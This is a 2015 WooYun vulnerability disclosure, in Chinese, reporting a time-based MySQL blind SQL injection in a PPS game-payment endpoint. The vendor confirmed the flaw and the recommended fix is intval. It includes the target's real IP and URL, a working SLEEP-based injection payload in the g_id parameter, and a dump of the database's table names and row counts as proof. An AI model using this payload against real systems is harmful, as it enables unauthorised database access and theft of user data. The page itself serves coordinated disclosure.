当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157389

漏洞标题:PPS某站MySQL盲注

相关厂商:PPS网络电视

漏洞作者: hecate

提交时间:2015-12-01 19:09

修复时间:2016-01-16 10:14

公开时间:2016-01-16 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

7W多user

详细说明:

这个链接中的g_id就有intval
http://211.151.142.213/gamepay/game_pay_main/index?g_id=314&sidebar_id=2&tid=8001&server_type=106649
而下面这个地址的g_id参数没有intval,疏忽了吧
http://211.151.142.213/gamepay/game_pay_main/check_game_user?g_id=615&user_name=11111111&server_id=257027&t=0%2E5307019442298461

http://211.151.142.213/gamepay/game_pay_main/check_game_user?g_id=615 AND (SELECT * FROM (SELECT(SLEEP(5)))wyLc)&user_name=11111111&server_id=257027&t=0.5307019442298461


pps.png

漏洞证明:

Database: g_pps_tv
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| game_active_awards_prize_log | 458129 |
| game_active_awards_log | 447847 |
| game_sync_log | 160682 |
| game_weixin_user | 77937 |
| game_news | 48045 |
| game_server_map | 30185 |
| game_server | 29324 |
| game_apk_log | 27271 |
| game_active_awards_pay_log | 25272 |
| game_active_awards_lucky_draw | 20228 |
| game_active_gift_get_log | 19743 |
| game_server_info_mobile | 17735 |
| game_server_info | 12450 |
| game_active_appointment_log | 9173 |
| pps_bbs_ban_user | 7085 |
| game_homepage | 6082 |
| game_action_log | 5316 |
| game_info | 3948 |
| game_info_mobile | 3597 |
| game_apk_info_log | 3539 |
| single_game_id_mapping | 2596 |
| developer_user | 1452 |
| pps_company_info | 1320 |
| single_game_apk_info | 1102 |
| developer_action_log | 1088 |
| game_mobile_igame_config | 416 |
| websql_fav | 414 |
| websql_log | 414 |
| game_info_web | 347 |
| production_topics_game | 314 |
| pps_game_company_relation | 312 |
| game_webinfo | 305 |
| game_cps_import | 276 |
| pps_weixin_keywords_reply | 261 |
| game_active_awards_prize | 201 |
| game_new_cate | 201 |
| developer_game_check_progress | 198 |
| developer_game_dock_info | 198 |
| developer_game_evaluation | 198 |
| developer_game_info | 198 |
| game_web_interface_config | 132 |
| customer_notice | 130 |
| game_active_awards | 128 |
| game_active_awards_rules | 128 |
| game_active_config | 71 |
| game_apk_type | 69 |
| game_active_api_log | 50 |
| production_menu | 48 |
| game_active_gift_condition | 38 |
| game_active_gift_config | 25 |
| sdk_mobile_game | 22 |
| production_topics | 19 |
| developer_msg_tpl | 18 |
| game_info_html5 | 12 |
| game_active_awards_physical | 11 |
| game_active_condition | 10 |
| game_stat_position | 10 |
| game_active_gift_condition_tpl | 3 |
| game_active_tpl | 3 |
| game_qq_sdk | 3 |
| game_singlegame_qudao_relation | 3 |
| developer_document | 2 |
| pps_qudao_game_alias | 2 |
| game_single_qudao_special | 1 |
+--------------------------------+---------+

修复方案:

intval

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-02 10:13

厂商回复:

感谢关注爱奇艺PPS,漏洞确认存在,我们会尽快修复。 :)

最新状态:

暂无